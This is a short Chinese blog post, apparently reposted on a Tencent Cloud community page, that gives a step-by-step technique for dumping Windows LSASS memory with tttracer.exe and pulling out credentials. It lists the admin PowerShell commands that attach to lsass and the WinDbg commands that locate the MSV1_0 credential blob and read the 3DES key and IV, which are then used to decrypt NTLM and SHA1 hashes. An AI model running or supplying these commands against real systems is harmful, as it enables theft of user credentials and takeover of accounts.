前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Lsass dump is dead, long live Lsass Time Travel!

Lsass dump is dead, long live Lsass Time Travel!

作者头像
鸿鹄实验室
发布2022-11-02 17:05:24
5260
发布2022-11-02 17:05:24
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室

分享一个小tips,利用tttracer.exe进行lsass转储,转储成Time Travel Debugging格式,思路来源:https://twitter.com/n_o_t_h_a_n_k_s/status/1559620227586875392

首先新建两个管理员权限的powershell终端,分别运行:

代码语言:javascript
复制
tttracer -dumpfull -attach (Get-Process lsass | Select -expand id)

tttracer -stop (Get-Process lsass | Select -expand id)

然后将得到的.run文件放入WinDbg Preview.

懒得本地再装WinDbg Preview.了直接用作者的图

然后运行下面的指令得到MSV1_0 blob区域

代码语言:javascript
复制
db poi(poi(poi(poi(lsasrv!LogonSessionList))+0x108)+0x10)+0x28+0x8 L0x1b0

然后运行下面的指令拿到3des的key和iv

代码语言:javascript
复制
db lsasrv!InitializationVector L8

db poi(poi(lsasrv!h3DesKey)+0x10)+0x38+4 L0x18

最后就是用key和iv去解密blob拿到ntlm、sha1

注意该方法dump的文件mimikatz无法解密,不同版本偏移不同所以windbg命令也不相同

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-08-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档